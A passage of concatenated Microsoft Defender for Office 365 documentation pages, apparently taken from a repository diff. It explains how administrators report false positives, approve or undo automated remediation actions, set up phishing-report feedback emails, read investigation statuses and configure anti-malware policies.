-|User|Data exfiltration <br> (A user violated email or file-sharing [DLP policies](/purview/dlp-learn-about-dlp) |Automated investigation doesn't result in a specific pending action. <p> [Get started with Activity Explorer](/purview/data-classification-activity-explorer#get-started-with-activity-explorer).|
-|User|Anomalous email sending <br> (A user recently sent more email than during the previous 7-10 days.)|Automated investigation doesn't result in a specific pending action. <p> Sending a large volume of email isn't malicious by itself; the user might just have sent email to a large group of recipients for an event. To investigate, use the [New users forwarding email insight in the EAC](/exchange/monitoring/mail-flow-insights/mfi-new-users-forwarding-email-insight) and [Outbound message report in the EAC](/exchange/monitoring/mail-flow-reports/mfr-inbound-messages-and-outbound-messages-reports) to determine what's going on and take action.|
-
-## Next steps
--- [View details and results of an automated investigation in Microsoft Defender for Office 365](air-view-investigation-results.md)-- [View pending or completed remediation actions following an automated investigation in Microsoft Defender for Office 365](air-review-approve-pending-completed-actions.md)-
-## Related articles
--- [Learn about automated investigation in Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/automated-investigations)-- [Learn about capabilities in Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-defender)
security Air Report False Positives Negatives https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-report-false-positives-negatives.md
- Title: "How to report false positives or false negatives following automated investigation in Microsoft Defender for Office 365"
-description: Was something missed or wrongly detected by AIR in Microsoft Defender for Office 365? Learn how to submit false positives or false negatives to Microsoft for analysis.
-- NOCSH--- Previously updated : 06/09/2023---- m365-security-- tier2---- autoir
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# How to report false positives/negatives in automated investigation and response capabilities
--
-If [automated investigation and response (AIR) capabilities in Office 365](air-about.md) missed or wrongly detected something, there are steps your security operations team can take to fix it. Such actions include:
--- [Reporting a false positive/negative to Microsoft](#report-a-false-positivenegative-to-microsoft-for-analysis);-- [Adjusting alerts](#adjust-an-alert-to-prevent-false-positives-from-recurring) (if needed); and-- [Undoing remediation actions that were taken](#undo-a-remediation-action).-
-Use this article as a guide.
-
-## Report a false positive/negative to Microsoft for analysis
-
-If AIR in Microsoft Defender for Office 365 missed an email message, an email attachment, a URL in an email message, or a URL in an Office file, you can [submit suspected spam, phish, URLs, and files to Microsoft for Office 365 scanning](submissions-admin.md).
-
-You can also [Submit a file to Microsoft for malware analysis](https://www.microsoft.com/wdsi/filesubmission).
-
-## Adjust an alert to prevent false positives from recurring
-
-If an alert is triggered by legitimate use, or the alert is inaccurate, you can [Manage alerts in the Defender for Cloud Apps portal](/cloud-app-security/managing-alerts).
-
-If your organization is using [Microsoft Defender for Endpoint](/windows/security/threat-protection) in addition to Office 365, and a file, IP address, URL, or domain is treated as malware on a device, even though it's safe, you can [create a custom indicator with an "Allow" action for your device](/windows/security/threat-protection/microsoft-defender-atp/manage-indicators).
-
-## Undo a remediation action
-
-In most cases, if a remediation action was taken on an email message, email attachment, or URL, and the item is actually not a threat, your security operations team can undo the remediation action and take steps to prevent the false positive from recurring. You can either use [Threat Explorer](#undo-an-action-using-threat-explorer) or the [Actions tab for an investigation](#undo-an-action-in-the-action-center) to undo an action.
-
-> [!IMPORTANT]
-> Make sure you have the necessary permissions before attempting to perform the following tasks.
-
-### Undo an action using Threat Explorer
-
-With Threat Explorer, your security operations team can find an email affected by an action and potentially undo the action.
-
-|Scenario|Undo Options|Learn more|
-||||
-|An email message was routed to a user's Junk Email folder|<ul><li>Move the message to the user's Deleted Items folder</li><li>Move the message to the user's Inbox</li><li>Delete the message</li></ul>|[Find and investigate malicious email that was delivered in Office 365](threat-explorer-investigate-delivered-malicious-email.md)|
-|An email message or a file was quarantined|<ul><li>Release the email or file</li><li> Delete the email or file</li></ul>|[Manage quarantined messages as an admin](quarantine-admin-manage-messages-files.md)|
-
-### Undo an action in the Action center
-
-In the Action center, you can see remediation actions that were taken and potentially undo the action.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to the Action center by selecting **Action center**. To go directly to the Action center, use <https://security.microsoft.com/action-center/>.
-2. In the Action center, select the **History** tab to view the list of completed actions.
-3. Select an item. Its flyout pane opens.
-4. In the flyout pane, select **Undo**. (Only actions that can be undone will have an **Undo** button.)
-
-## See also
--- [Microsoft Defender for Office 365](mdo-about.md)-- [Automated investigations in Microsoft Defender for Office 365](air-about.md)
security Air Review Approve Pending Completed Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-review-approve-pending-completed-actions.md
- Title: Review and manage remediation actions in Microsoft Defender for Office 365-- NOCSH------ MET150-- MOE150--- m365-security-- tier2-
-description: Learn about remediation actions in automated investigation and response capabilities in Microsoft Defender for Office 365 Plan 2.
- Previously updated : 06/09/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Review and manage remediation actions in Office 365
--
-As automated investigations on email & collaboration content result in verdicts, such as *Malicious* or *Suspicious*, certain remediation actions are created. In Microsoft Defender for Office 365, remediation actions can include:
--- Soft deleting email messages or clusters-- Turning off external mail forwarding-
-These remediation actions are not taken unless and until your security operations team approves them. We recommend reviewing and approving any pending actions as soon as possible so that your automated investigations complete in a timely manner. You need to be part of Search & purge role before taking any actions.
-
-We've added additional checks for duplicate or overlapping investigations with the same clusters approved multiple times. If the same investigation cluster is already approved in the previous hour, new duplicate remediation will not be processed again. This behavior doesn't remove duplicate investigations or investigation evidence - it simply de-duplicates approved actions to improve remediation processing speed. For the duplicate approved cluster investigations, you won't see action details in the [action center](https://security.microsoft.com/action-center/history) side panel.
-
-## Approve (or reject) pending actions
-
-There are four different ways to find and take auto investigation actions:
--- [Incident queue](https://security.microsoft.com/incidents)-- Investigation itself (accessed via Incident or from an alert)-- [Action center](https://security.microsoft.com/action-center/pending)-- [Investigation and remediation investigations queue](https://security.microsoft.com/airinvestigation)-
-## Incident queue
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to the **Incidents** page at **Incidents & alerts** \> **Incidents**. To go directly to the **Incidents** page, use <https://security.microsoft.com/incidents>.
-2. Filter on **Pending action** for the Automated investigation state (optional).
-3. On the **Incidents** page, select an incident name to open its summary page.
-4. Select the **Evidence and Response** tab.
-5. Select an item in the list to open its flyout pane.
-6. Review the information, and then take one of the following steps:
- - Select the Approve pending action option to initiate a pending action.
- - Select the Reject pending action option to prevent a pending action from being taken.
-
-## Action center
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to the **Action center** page by selecting **Action center**. To go directly to the **Action center** page, use <https://security.microsoft.com/action-center/pending>.
-2. On the **Action center** page, verify that the **Pending** tab is selected, and then review the list of actions that are awaiting approval.
- - Select **Open investigation page** to view more details about the investigation.
- - Select **Approve** to initiate a pending action.
- - Select **Reject** to prevent a pending action from being taken.
-
-> [!NOTE]
-> Pending actions time out after awaiting approval for one week.
-
-## Investigation and remediation investigations queue
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to the **Threat investigation** page at **Email & collaboration** \> **Investigations**. To go directly to the **Threat investigation** page, use <https://security.microsoft.com/airinvestigation>.
-2. On the **Threat investigation** page, find and an item from the list whose status is **Pending action**.
-3. Click :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Open in new window** on the list time (between **ID** and **Status**).
-4. In the page that opens, take approve or reject actions.
-
-## Change or undo one remediation action
-
-There are two different ways to reconsider submitted actions:
--- Through the [unified action center](https://security.microsoft.com/action-center).-- Though the [Office action center](https://security.microsoft.com/threatincidents).-
-## Change or undo through the unified action center
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to the unified action center by selecting **Action center**. To go directly to the unified action center, use <https://security.microsoft.com/action-center/>.
-2. On the **Action center** page, select the **History** tab, and then select the action that you want to change or undo.
-3. In the pane on the right side of the screen, select the appropriate action (**move to inbox**, **move to junk**, **move to deleted items**, **soft delete**, or **hard delete**).
-
-## Change or undo through the Office action center
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to the Office action center at **Email & collaboration** \> **Review** \> **Action center**. To go directly to the Office action center, use <https://security.microsoft.com/threatincidents>.
-2. On the **Action center** page, select the appropriate remediation.
-3. In the side panel, click on the mail submissions entry and wait for the list to load.
-4. Wait for the Action button at the top to enable and select the Action button to change the action type.
-5. This will create the appropriate actions.
-
-## Next steps
--- [Use Threat Explorer](threat-explorer-real-time-detections-about.md)-- [Admin /Manual Actions](remediate-malicious-email-delivered-office-365.md)-- [How to report false positives/negatives in automated investigation and response capabilities](air-report-false-positives-negatives.md)-
-## See also
--- [View details and results of an automated investigation in Office 365](air-view-investigation-results.md)
security Air User Automatic Feedback Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-user-automatic-feedback-response.md
- Title: Automatic user notifications for user reported phishing results in AIR
-description: Admins can learn about the automatic feedback response feature that sends the results of automated investigation and response (AIR) to user reported phishing messages.
----- Previously updated : 12/21/2023-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Automatic user notifications for user reported phishing results in AIR
-
-> [!NOTE]
-> The features described in this article are currently in Public Preview, aren't available in all organizations, and are subject to change.
-
-In Microsoft 365 organizations with Exchange Online mailboxes, admins can configure the backend for messages that users report as malicious or not malicious in Outlook (send to Microsoft, send to a reporting mailbox, or both), and configure the various notification options for user reported messages. For more information, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-In Microsoft 365 organizations with Microsoft Defender for Office 365 Plan 2, when a user reports a message as phishing, an investigation is automatically created in [automated investigation and response (AIR)](air-about.md). Admins can configure the user reported message settings to send an email notification to the user who reported the message based on the verdict from AIR. This notification is also known as _automatic feedback response_.
-
-This article explains how to enable and customize automatic feedback response for specific AIR verdicts, how the notification email messages are sent, and what the notifications look like.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **User reported settings** page, use <https://security.microsoft.com/securitysettings/userSubmission>.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Organization Management** or **Security Administrator** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** or **Security Administrator** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Use the Microsoft Defender portal to configure automatic feedback response
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Settings** \> **Email & collaboration** \> **User reported settings** tab. To go directly to the **User reported settings** page, use <https://security.microsoft.com/securitysettings/userSubmission>.
-
-2. On the **User reported settings** page, verify that **Monitor reported messages in Outlook** is selected.
-
-3. In the **Email notifications** \> **Results email** section, select **Automatically email users the results of the investigation**, and then select one or more of the following options that appear:
- - **Phishing or malware**: An email notification is sent to the user who reported the message as phishing when AIR identifies the threat as phishing, high confidence phishing, or malware.
- - **Spam**: An email notification is sent to the user who reported the message as phishing when AIR identifies the threat as spam.
- - **No threats found**: An email notification is sent to the user who reported the message as phishing when AIR identifies no threat.
-
- :::image type="content" source="../../media/air-automatic-feedback.png" alt-text="Automatic feedback response options on the User reported settings page." lightbox="../../media/air-automatic-feedback.png":::
-
-4. The notification email uses the same template as when an admin selects :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **Mark as and notify** on the **Submissions** page at <https://security.microsoft.com/reportsubmission>.
-
- You can customize the notification email by selecting the **Customize results email** link.
-
- In the **Customize admin review email notifications** flyout that opens, configure the following settings on the **Phishing** (which corresponds to the **Phishing or malware** automatic feedback response option), **Junk** and **No threats found** tabs:
-
- - **Email body results text**: Enter the custom text to use. You can use different text for **Phishing**, **Junk** and **No threats found**.
- - **Email footer text**: Enter the custom message footer text to use. The same text is used for **Phishing**, **Junk** and **No threats found**.
-
- :::image type="content" source="../../media/air-automatic-feedback-customize-email-notifications.png" alt-text="The user email notification customization options on the User reported settings page." lightbox="../../media/air-automatic-feedback-customize-email-notifications.png":::
-
- When you're finished in the **Customize admin review email notifications** flyout, select **Confirm** to return to the **User reported settings** page.
-
-## How automated feedback response works
-
-After you enable automated feedback response, the user who reported the message as phishing receives an email notification based on the AIR verdict and the selected **Automatically email users the results of the investigation** options:
-
-> [!TIP]
-> The following screenshots show example notification email messages that are sent to users. As explained earlier, you can customize the notification email using the options in **Customize results email** in the user reported settings.
--- **No threats found**: If a user reports a message as phishing, the submission triggers AIR on the reported message. If the investigation finds no threats, the user who reported the message receives a notification email that looks like this:-
- :::image type="content" source="../../media/air-automatic-feedback-no-threats-found-email.png" alt-text="An example notification email for No threats found." lightbox="../../media/air-automatic-feedback-no-threats-found-email.png":::
--- **Spam**: If a user reports a message as phishing, the submission triggers AIR on the reported message. If the investigation finds the message is spam, the user who reported the message receives a notification email that looks like this:-
- :::image type="content" source="../../media/air-automatic-feedback-spam-email.png" alt-text="An example notification email for spam found." lightbox="../../media/air-automatic-feedback-spam-email.png":::
--- **Phishing or malware**: If a user reports a message as phishing, the submission triggers AIR on the reported message. What happens next depends on the results of the investigation:
- - **High confidence phishing or malware**: The message needs to be remediated using one of the following actions:
- - Approve the recommended action (shown as pending actions in the investigation or in the Action center).
- - Remediation through other means (for example, [Threat Explorer](threat-explorer-real-time-detections-about.md)).
-
- After the message has been remediated, the investigation is closed as **Remediated** or **Partially remediated**. Only when the investigation status is one of those values is the email notification sent to the user who reported the message.
-
- > [!TIP]
- > For high confidence phishing or malware, the investigation might immediate close as **Remediated** if the message isn't found in the mailbox (the message was deleted). There's no pending investigation to close, so no email notification is sent to the user who reported the message.
-
- - **Phishing**: The investigation creates no pending actions, but the user still receives a notification email that the message was found to be phishing. The notification email looks like this:
-
- :::image type="content" source="../../media/air-automatic-feedback-phishing-or-malware-email.png" alt-text="An example notification email for phishing or malware found." lightbox="../../media/air-automatic-feedback-phishing-or-malware-email.png":::
-
-When AIR reaches a verdict and the notification email is sent to the user who reported the message as phishing, the following property values are shown for the entry on the **User reported** tab on the **Submissions** page in the Defender portal:
--- **Marked as**: Contains the verdict.-- **Marked by**: The value is **Automation**.-
-Whether the message was automatically or manually sent to Microsoft for review, or the message was investigated by AIR, the verdict is shown in the **Marked as** property. For more information about the **User reported** tab on the **Submissions** page, see [Admin options for user reported messages](submissions-admin.md#admin-options-for-user-reported-messages).
-
-## Learn More
-
-To learn more about submissions and investigations in Defender for Microsoft 365, see the following articles:
--- [Automated investigation and response in Microsoft Defender for Office 365](air-about.md)-- [View the results of an automated investigation in Microsoft 365](air-view-investigation-results.md)-- [Admin review for reported messages](admin-review-reported-message.md)-- [How automated investigation and response works in Microsoft Defender for Office 365](air-examples.md)
security Air View Investigation Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-view-investigation-results.md
- Title: View the results of an automated investigation in Microsoft 365-- NOCSH------ MET150-- MOE150--- m365-security-- tier2
-description: During and after an automated investigation in Microsoft 365, you can view the results and key findings.
Previously updated : 06/09/2023-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Details and results of an automated investigation in Microsoft 365
--
-When an [automated investigation](air-about.md) occurs in [Microsoft Defender for Office 365](mdo-about.md), details about that investigation are available during and after the automated investigation process. If you have the necessary permissions, you can view those details in the Microsoft Defender portal. Investigation details provide you with up-to-date status, and the ability to approve any pending actions.
-
-> [!TIP]
-> Check out the new, unified investigation page in the Microsoft Defender portal. To learn more, see [(NEW!) Unified investigation page](../defender/m365d-autoir-results.md#new-unified-investigation-page).
-
-## Investigation status
-
-The investigation status indicates the progress of the analysis and actions. As the investigation runs, status changes to indicate whether threats were found, and whether actions have been approved.
-
-|Status|Description|
-|||
-|**Starting**|The investigation has been triggered and waiting to start running.|
-|**Running**|The investigation process has started and is underway. This state also occurs when [pending actions](air-review-approve-pending-completed-actions.md#approve-or-reject-pending-actions) are approved.|
-|**No Threats Found**|The investigation has finished and no threats (user account, email message, URL, or file) were identified. <p> **TIP**: If you suspect something was missed (such as a false negative), you can take action using [Threat Explorer](threat-explorer-real-time-detections-about.md).|
-|**Partially Investigated**|The automated investigation found issues, but there are no specific remediation actions to resolve those issues. <p> The **Partially Investigated** status can occur when some type of user activity was identified but no cleanup actions are available. Examples include any of the following user activities: <ul><li>A [data loss prevention](/purview/dlp-learn-about-dlp) event</li><li>An email sending anomaly</li><li>Sent malware</li><li>Sent phish</li></ul> <br/> **Note**: This **Partially Investigated** status used to be labeled as **Threats Found**. <p> The investigation found no malicious URLs, files, or email messages to remediate, and no mailbox activity to fix, such as turning off forwarding rules or delegation. <p> **TIP**: If you suspect something was missed (such as a false negative), you can investigate and take action using [Threat Explorer](threat-explorer-real-time-detections-about.md)|
-|**Terminated By System**|The investigation stopped. An investigation can stop for several reasons: <ul><li>The investigation's pending actions expired. Pending actions time out after awaiting approval for one week</li><li>There are too many actions. For example, if there are too many users clicking on malicious URLs, it can exceed the investigation's ability to run all the analyzers, so the investigation halts</li></ul> <br/> **TIP**: If an investigation halts before actions were taken, try using [Threat Explorer](threat-explorer-real-time-detections-about.md) to find and address threats.|
-|**Pending Action**|The investigation has found a threat, such as a malicious email, a malicious URL, or a risky mailbox setting, and an action to remediate that threat is [awaiting approval](air-review-approve-pending-completed-actions.md). <p> The **Pending Action** state is triggered when any threat with a corresponding action is found. However, the list of pending actions can increase as an investigation runs. View investigation details to see if other items are still pending completion.|
-|**Remediated**|The investigation finished and all remediation actions were approved (noted as fully remediated). <p> **NOTE**: Approved remediation actions can have errors that prevent the actions from being taken. Regardless of whether remediation actions are successfully completed, the investigation status doesn't change. View investigation details.|
-|**Partially Remediated**|The investigation resulted in remediation actions, and some were approved and completed. Other actions are still [pending](air-review-approve-pending-completed-actions.md).|
-|**Failed**|At least one investigation analyzer ran into a problem where it couldn't complete properly. <p> **NOTE** If an investigation fails after remediation actions were approved, the remediation actions might still have succeeded. View the investigation details.|
-|**Queued By Throttling**|An investigation is being held in a queue. When other investigations complete, queued investigations begin. Throttling helps avoid poor service performance. <p> **TIP**: Pending actions can limit how many new investigations can run. Make sure to [approve (or reject) pending actions](air-review-approve-pending-completed-actions.md#approve-or-reject-pending-actions).|
-|**Terminated By Throttling**|If an investigation is held in the queue too long, it stops. <p> **TIP**: You can [start an investigation from Threat Explorer](air-examples.md#example-a-security-administrator-triggers-an-investigation-from-threat-explorer).|
-
-## View details of an investigation
-
-1. Go to the Microsoft Defender portal (<https://security.microsoft.com>) and sign in.
-2. In the navigation pane, select **Actions & submissions** \> **Action center**.
-3. On either the **Pending** or **History** tabs, select an action. Its flyout pane opens.
-4. In the flyout pane, select **Open investigation page**.
-5. Use the various tabs to learn more about the investigation.
-
-## View details about an alert related to an investigation
-
-Certain kinds of alerts trigger automated investigation in Microsoft 365. To learn more, see [alert policies that trigger automated investigations](air-about.md#which-alert-policies-trigger-automated-investigations).
-
-1. Go to the Microsoft Defender portal (<https://security.microsoft.com>) and sign in.
-2. In the navigation pane, select **Action center**.
-3. On either the **Pending** or **History** tabs, select an action. Its flyout pane opens.
-4. In the flyout pane, select **Open investigation page**.
-5. Select the **Alerts** tab to view a list of all of the alerts associated with that investigation.
-6. Select an item in the list to open its flyout pane. There, you can view more information about the alert.
-
-## Keep the following points in mind
--- Email counts are calculated at the time of the investigation, and some counts are recalculated when you open investigation flyouts (based on an underlying query).--- The email counts shown for the email clusters on the **Email** tab and the email quantity value shown on cluster flyout are calculated at the time of investigation, and don't change.--- The email count shown at the bottom of the **Email** tab of the email cluster flyout and the count of email messages shown in Explorer reflect email messages received after the investigation's initial analysis.-
- Thus, an email cluster that shows an original quantity of 10 email messages would show an email list total of 15 when five more email messages arrive between the investigation analysis phase and when the admin reviews the investigation. Likewise, old investigations might start showing higher counts than Explorer queries show, because data in Microsoft Defender for Office 365 Plan 2 expires after seven days for trials and after 30 days for paid licenses.
-
- Showing both count historical and current counts in different views is done to indicate the email impact at the time of investigation and the current impact up until the time that remediation is run.
--- In the context of email, you might see a volume anomaly threat surface as part of the investigation. A volume anomaly indicates a spike in similar email messages around the investigation event time compared to earlier timeframes. A spike in email traffic together with certain characteristics (for example, subject and sender domain, body similarity, and sender IP) is typical of the start of email campaigns or attacks. However, bulk, spam, and legitimate email campaigns commonly share these characteristics.--- Volume anomalies represent a potential threat, and accordingly could be less severe compared to malware or phish threats that are identified using anti-virus engines, detonation, or malicious reputation.--- You don't have to approve every action. If you don't agree with the recommended action or your organization doesn't choose certain types of actions, then you can choose to **Reject** the actions or simply ignore them and take no action.--- Approving and/or rejecting all actions lets the investigation fully close (status becomes remediated), while leaving some actions incomplete results in the investigation status changing to a partially remediated state.-
-## Next steps
--- [Review and approve pending actions](air-review-approve-pending-completed-actions.md#approve-or-reject-pending-actions)
security Alert Policies Defender Portal https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/alert-policies-defender-portal.md
- Title: Alert policies in the Microsoft Defender portal
- - NOCSH
-----
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can use the Alert policy page in the Microsoft Defender portal to view and create alert policies to trigger alerts when the specified actions occur.
- Previously updated : 10/9/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Alert policies in the Microsoft Defender portal
--
-In Microsoft 365 organizations with mailboxes in Exchange Online, alert policies generate alerts in the alert dashboard when users take actions that match the conditions of the policy. There are many default alert policies that help you monitor activities. For example, assigning admin privileges in Exchange Online, malware attacks, phishing campaigns, and unusual levels of file deletions and external sharing.
-
-> [!TIP]
-> Alert policies in the Microsoft Defender portal are identical to alert policies in the Microsoft Purview compliance portal at <https://compliance.microsoft.com/alertpolicies>.
-
-## What do you need to know before you begin?
--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell):
- - _Read only access to the Alert policies page_: **Security operations / Security data / Security data basics (read)**.
- - _Manage alert policies_: **Authorization and settings / Security settings / Detection tuning (manage)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md):
- - _Create and manage alert policies in the Threat management category_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _View alerts in the Threat management_ category: Membership in the **Security Reader** role group.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
- For information about other alert policy categories, see [Permissions required to view alerts](/purview/alert-policies#rbac-permissions-required-to-view-alerts).
-
-## Open alert policies
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Alert policy**. Or, to go directly to the **Alert policy** page, use <https://security.microsoft.com/alertpoliciesv2>.
-
-On the **Alert policy** page, you can view and create alert policies. For more information, see [Alert policies in Microsoft 365](/purview/alert-policies)
security Anti Malware Policies Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-malware-policies-configure.md
- Title: Configure anti-malware policies
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-description: Admins can learn how to view, create, modify, and remove anti-malware policies in Exchange Online Protection (EOP).
-- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure anti-malware policies in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, email messages are automatically protected against malware by EOP. EOP uses anti-malware policies for malware protection settings. For more information, see [Anti-malware protection](anti-malware-protection-about.md).
-
-> [!TIP]
-> We recommend turning on and adding all users to the Standard and/or Strict preset security policies. For more information, see [Configure protection policies](mdo-deployment-guide.md#step-2-configure-protection-policies).
-
-The default anti-malware policy automatically applies to all recipients. For greater granularity, you can also create custom anti-malware policies that apply to specific users, groups, or domains in your organization.
-
-> [!NOTE]
-> The default anti-malware policy applies to inbound and outbound email. Custom anti-malware policies apply to inbound email only.
-
-You can configure anti-malware policies in the Microsoft Defender portal or in PowerShell (Exchange Online PowerShell for Microsoft 365 organizations with mailboxes in Exchange Online; standalone EOP PowerShell for organizations without Exchange Online mailboxes).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Anti-malware** page, use <https://security.microsoft.com/antimalwarev2>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Add, modify, and delete policies_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to policies_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For our recommended settings for anti-malware policies, see [EOP anti-malware policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-malware-policy-settings).-
- > [!TIP]
- > Settings in the default or custom anti-malware policies are ignored if a recipient is also included in the [Standard or Strict preset security policies](preset-security-policies.md). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-## Use the Microsoft Defender portal to create anti-malware policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-Malware** in the **Policies** section. To go directly to the **Anti-malware** page, use <https://security.microsoft.com/antimalwarev2>.
-
-2. On the **Anti-malware** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to open the new anti-malware policy wizard.
-
-3. On the **Name your policy** page, configure these settings:
- - **Name**: Enter a unique, descriptive name for the policy.
- - **Description**: Enter an optional description for the policy.
-
- When you're finished on the **Name your policy** page, select **Next**.
-
-4. On the **Users and domains** page, identify the internal recipients that the policy applies to (recipient conditions):
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the appropriate box, start typing a value, and select the value that you want from the results. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users or groups, enter an asterisk (\*) by itself to see all available values.
-
- You can use a condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- - **Exclude these users, groups, and domains**: To add exceptions for the internal recipients that the policy applies to (recipient exceptions), select this option and configure the exceptions.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- When you're finished on the **Users and domains** page, select **Next**.
-
-5. On the **Protection settings** page, configure the following settings:
-
- - **Protection settings** section:
-
